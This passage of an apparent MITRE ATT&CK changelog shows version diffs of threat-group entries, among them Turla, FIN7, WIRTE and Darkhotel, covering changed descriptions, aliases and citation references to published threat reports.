modified2021-10-12 19:21:39.120000+00:002022-04-11 18:05:20.983000+00:00
description[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018)[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)
external_references[1]['description'](Citation: Dell TG-3390) (Citation: Hacker News LuckyMouse June 2018)(Citation: Dell TG-3390)(Citation: Hacker News LuckyMouse June 2018)
external_references[2]['description'](Citation: Dell TG-3390) (Citation: Nccgroup Emissary Panda May 2018) (Citation: Hacker News LuckyMouse June 2018)(Citation: Dell TG-3390)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Hacker News LuckyMouse June 2018)
external_references[3]['description'](Citation: Gallagher 2015) (Citation: Nccgroup Emissary Panda May 2018) (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Gallagher 2015)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron Tiger April 2021)
external_references[4]['source_name']BRONZE UNIONIron Tiger
external_references[4]['description'](Citation: SecureWorks BRONZE UNION June 2017) (Citation: Nccgroup Emissary Panda May 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)
external_references[5]['description'](Citation: Nccgroup Emissary Panda May 2018) (Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)
external_references[6]['source_name']Iron TigerLuckyMouse
external_references[6]['description'](Citation: Hacker News LuckyMouse June 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)
external_references[7]['source_name']LuckyMouseBRONZE UNION
external_references[7]['description'](Citation: Securelist LuckyMouse June 2018) (Citation: Hacker News LuckyMouse June 2018)(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)
external_references[8]['source_name']Dell TG-3390Earth Smilodon
external_references[8]['description']Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.(Citation: Trend Micro Iron Tiger April 2021)
external_references[10]['source_name']Securelist LuckyMouse June 2018Dell TG-3390
external_references[10]['description']Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.
external_references[10]['url']https://securelist.com/luckymouse-hits-national-data-center/86083/https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
external_references[11]['source_name']Hacker News LuckyMouse June 2018Unit42 Emissary Panda May 2019
external_references[11]['description']Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.
external_references[11]['url']https://thehackernews.com/2018/06/chinese-watering-hole-attack.htmlhttps://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
external_references[12]['source_name']Nccgroup Emissary Panda May 2018Gallagher 2015
external_references[12]['description']Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.
external_references[12]['url']https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
external_references[13]['source_name']Gallagher 2015Hacker News LuckyMouse June 2018
external_references[13]['description']Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.
external_references[13]['url']http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/https://thehackernews.com/2018/06/chinese-watering-hole-attack.html
external_references[14]['source_name']Unit42 Emissary Panda May 2019Securelist LuckyMouse June 2018
external_references[14]['description']Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.
external_references[14]['url']https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/https://securelist.com/luckymouse-hits-national-data-center/86083/
x_mitre_version1.52.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesEarth Smilodon
external_references{'source_name': 'Trend Micro Iron Tiger April 2021', 'description': 'Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html'}
external_references{'source_name': 'Trend Micro DRBControl February 2020', 'description': 'Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.', 'url': 'https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf'}
external_references{'source_name': 'Nccgroup Emissary Panda May 2018', 'description': 'Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.', 'url': 'https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/'}

[G0010] Turla

Current version: 3.0

Version changed from: 2.1 → 3.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://securelist.com/the-epic-turla-operation/65545/
values_changed
STIX FieldOld valueNew Value
modified2021-08-27 14:36:25.289000+00:002022-09-28 21:27:07.133000+00:00
external_references[1]['source_name']TurlaBelugasturgeon
external_references[1]['description'](Citation: Kaspersky Turla)(Citation: Accenture HyperStack October 2020)
external_references[2]['source_name']Group 88Krypton
external_references[2]['description'](Citation: Leonardo Turla Penquin May 2020)(Citation: CrowdStrike VENOMOUS BEAR)
external_references[3]['source_name']BelugasturgeonSnake
external_references[3]['description'](Citation: Accenture HyperStack October 2020)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Talos TinyTurla September 2021)
external_references[4]['source_name']WaterbugVenomous Bear
external_references[4]['description']Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: Talos TinyTurla September 2021)
external_references[5]['source_name']WhiteBearTurla
external_references[5]['description']WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Kaspersky Turla)
external_references[6]['source_name']VENOMOUS BEARGroup 88
external_references[6]['description'](Citation: CrowdStrike VENOMOUS BEAR)(Citation: Leonardo Turla Penquin May 2020)
external_references[7]['source_name']SnakeIRON HUNTER
external_references[7]['description'](Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Secureworks IRON HUNTER Profile)
external_references[8]['source_name']KryptonAccenture HyperStack October 2020
external_references[8]['description'](Citation: CrowdStrike VENOMOUS BEAR)Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.
external_references[9]['source_name']Kaspersky TurlaWaterbug
external_references[9]['description']Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug)
external_references[10]['source_name']ESET Gazer Aug 2017Talos TinyTurla September 2021
external_references[10]['description']ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.
external_references[10]['url']https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdfhttps://blog.talosintelligence.com/2021/09/tinyturla.html
external_references[11]['source_name']CrowdStrike VENOMOUS BEARESET Turla Mosquito Jan 2018
external_references[11]['description']Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.
external_references[11]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf
external_references[12]['source_name']ESET Turla Mosquito Jan 2018ESET Gazer Aug 2017
external_references[12]['description']ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.
external_references[12]['url']https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdfhttps://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
external_references[13]['source_name']Leonardo Turla Penquin May 2020ESET Turla PowerShell May 2019
external_references[13]['description']Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.
external_references[13]['url']https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdfhttps://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
external_references[14]['source_name']Accenture HyperStack October 2020Securelist WhiteBear Aug 2017
external_references[14]['description']Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.
external_references[14]['url']https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entityhttps://securelist.com/introducing-whitebear/81638/
external_references[15]['source_name']Symantec WaterbugKaspersky Turla
external_references[15]['description']Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
external_references[15]['url']https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1https://securelist.com/the-epic-turla-operation/65545/
external_references[16]['source_name']Securelist WhiteBear Aug 2017Leonardo Turla Penquin May 2020
external_references[16]['description']Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021.
external_references[16]['url']https://securelist.com/introducing-whitebear/81638/https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf
external_references[17]['source_name']ESET Turla PowerShell May 2019CrowdStrike VENOMOUS BEAR
external_references[17]['description']Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.
external_references[17]['url']https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/
x_mitre_version2.13.0
iterable_item_added
STIX FieldOld valueNew Value
aliasesIRON HUNTER
aliasesVenomous Bear
external_references{'source_name': 'Secureworks IRON HUNTER Profile', 'description': 'Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.', 'url': 'http://www.secureworks.com/research/threat-profiles/iron-hunter'}
external_references{'source_name': 'Symantec Waterbug', 'description': 'Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.', 'url': 'https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1'}
external_references{'source_name': 'WhiteBear', 'description': 'WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)'}
iterable_item_removed
STIX FieldOld valueNew Value
aliasesVENOMOUS BEAR

[G0090] WIRTE

Current version: 2.0

Version changed from: 1.2 → 2.0


Old Description
New Description
t1[WIRTE](https://attack.mitre.org/groups/G0090) is a threat gt1[WIRTE](https://attack.mitre.org/groups/G0090) is a threat g
>roup that has been active since at least August 2018. The gr>roup that has been active since at least August 2018. [WIRTE
>oup focuses on targeting Middle East defense and diplomats.(>](https://attack.mitre.org/groups/G0090) has targeted govern
>Citation: Lab52 WIRTE Apr 2019)>ment, diplomatic, financial, military, legal, and technology
 > organizations in the Middle East and Europe.(Citation: Lab5
 >2 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 14:50:57.491000+00:002022-04-15 19:50:19.478000+00:00
description[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019)[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)
x_mitre_version1.22.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Kaspersky WIRTE November 2021', 'description': 'Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.', 'url': 'https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044'}
Minor Version Changes

[G0052] CopyKittens

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
New Description
t1[CopyKittens](https://attack.mitre.org/groups/G0052) is an It1[CopyKittens](https://attack.mitre.org/groups/G0052) is an I
>ranian cyber espionage group that has been operating since a>ranian cyber espionage group that has been operating since a
>t least 2013. It has targeted countries including Israel, Sa>t least 2013. It has targeted countries including Israel, Sa
>udi Arabia, Turkey, the U.S., Jordan, and Germany. The group>udi Arabia, Turkey, the U.S., Jordan, and Germany. The group
> is responsible for the campaign known as Operation Wilted T> is responsible for the campaign known as Operation Wilted T
>ulip. (Citation: ClearSky CopyKittens March 2017) (Citation:>ulip.(Citation: ClearSky CopyKittens March 2017)(Citation: C
> ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov>learSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 20
> 2015)>15)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-05-26 12:32:58.912000+00:002022-08-08 21:29:36.462000+00:00
description[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)
external_references[2]['source_name']ClearSky CopyKittens March 2017ClearSky Wilted Tulip July 2017
external_references[2]['description']ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017.ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
external_references[2]['url']http://www.clearskysec.com/copykitten-jpost/http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf
external_references[3]['source_name']ClearSky Wilted Tulip July 2017ClearSky CopyKittens March 2017
external_references[3]['description']ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017.
external_references[3]['url']http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdfhttp://www.clearskysec.com/copykitten-jpost/
x_mitre_version1.51.6

[G0012] Darkhotel

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-22 17:37:58.136000+00:002022-10-19 22:07:30.243000+00:00
external_references[3]['source_name']Kaspersky DarkhotelSecurelist Darkhotel Aug 2015
external_references[3]['description']Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.
external_references[3]['url']https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdfhttps://securelist.com/darkhotels-attacks-in-2015/71713/
external_references[4]['source_name']Securelist Darkhotel Aug 2015Kaspersky Darkhotel
external_references[4]['description']Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018.Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.
external_references[4]['url']https://securelist.com/darkhotels-attacks-in-2015/71713/https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf
external_references[6]['source_name']Microsoft DUBNIUM June 2016Microsoft DUBNIUM July 2016
external_references[6]['description']Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021.
external_references[6]['url']https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/
external_references[8]['source_name']Microsoft DUBNIUM July 2016Microsoft DUBNIUM June 2016
external_references[8]['description']Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021.Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.
external_references[8]['url']https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/
x_mitre_version2.02.1

[G0046] FIN7

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Edward Millington']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referenceshttps://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttp://blog.morphisec.com/fin7-attacks-restaurant-industry
values_changed
STIX FieldOld valueNew Value
modified2021-10-19 00:02:08.486000+00:002022-07-20 20:06:44.706000+00:00
external_references[1]['source_name']FIN7Carbon Spider
external_references[1]['description'](Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)
external_references[2]['source_name']GOLD NIAGARAFIN7
external_references[2]['description'](Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)
external_references[3]['source_name']ITG14GOLD NIAGARA
external_references[3]['description']ITG14 shares campaign overlap with FIN7.(Citation: IBM Ransomware Trends September 2020)(Citation: Secureworks GOLD NIAGARA Threat Profile)
external_references[4]['source_name']Carbon SpiderFireEye CARBANAK June 2017
external_references[4]['description'](Citation: CrowdStrike Carbon Spider August 2021)Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.
external_references[5]['source_name']FireEye FIN7 March 2017FireEye FIN7 April 2017
external_references[5]['description']Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.
external_references[5]['url']https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.htmlhttps://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
external_references[6]['source_name']FireEye FIN7 April 2017FireEye FIN7 Aug 2018
external_references[6]['description']Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.
external_references[6]['url']https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.htmlhttps://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html
external_references[7]['source_name']FireEye CARBANAK June 2017Secureworks GOLD NIAGARA Threat Profile
external_references[7]['description']Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.htmlhttps://www.secureworks.com/research/threat-profiles/gold-niagara
external_references[8]['source_name']FireEye FIN7 Aug 2018FireEye FIN7 Shim Databases
external_references[8]['description']Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.
external_references[8]['url']https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.htmlhttps://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
external_references[9]['source_name']CrowdStrike Carbon Spider August 2021Morphisec FIN7 June 2017
external_references[9]['description']Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.
external_references[9]['url']https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/http://blog.morphisec.com/fin7-attacks-restaurant-industry
external_references[10]['source_name']Morphisec FIN7 June 2017ITG14
external_references[10]['description']Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)
external_references[11]['source_name']FireEye FIN7 Shim DatabasesCrowdStrike Carbon Spider August 2021
external_references[11]['description']Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
external_references[11]['url']https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.htmlhttps://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/
external_references[12]['source_name']Secureworks GOLD NIAGARA Threat ProfileFireEye FIN7 March 2017
external_references[12]['description']CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
external_references[12]['url']https://www.secureworks.com/research/threat-profiles/gold-niagarahttps://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
x_mitre_version2.02.1

[G0119] Indrik Spider

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1[Indrik Spider](https://attack.mitre.org/groups/G0119) is a t1[Indrik Spider](https://attack.mitre.org/groups/G0119) is a 
>Russia-based cybercriminal group that as been active since a>Russia-based cybercriminal group that has been active since 
>t least 2014. [Indrik Spider](https://attack.mitre.org/group>at least 2014. [Indrik Spider](https://attack.mitre.org/grou
>s/G0119) initially started with the [Dridex](https://attack.>ps/G0119) initially started with the [Dridex](https://attack
>mitre.org/software/S0384) banking Trojan, and then by 2017 t>.mitre.org/software/S0384) banking Trojan, and then by 2017 
>hey began running ransomware operations using [BitPaymer](ht>they began running ransomware operations using [BitPaymer](h
>tps://attack.mitre.org/software/S0570), [WastedLocker](https>ttps://attack.mitre.org/software/S0570), [WastedLocker](http
>://attack.mitre.org/software/S0612), and Hades ransomware.(C>s://attack.mitre.org/software/S0612), and Hades ransomware.(
>itation: Crowdstrike Indrik November 2018)(Citation: Crowdst>Citation: Crowdstrike Indrik November 2018)(Citation: Crowds
>rike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 20>trike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2
>19)>019)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-15 16:14:32.314000+00:002022-09-15 19:49:18.799000+00:00
description[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that as been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)
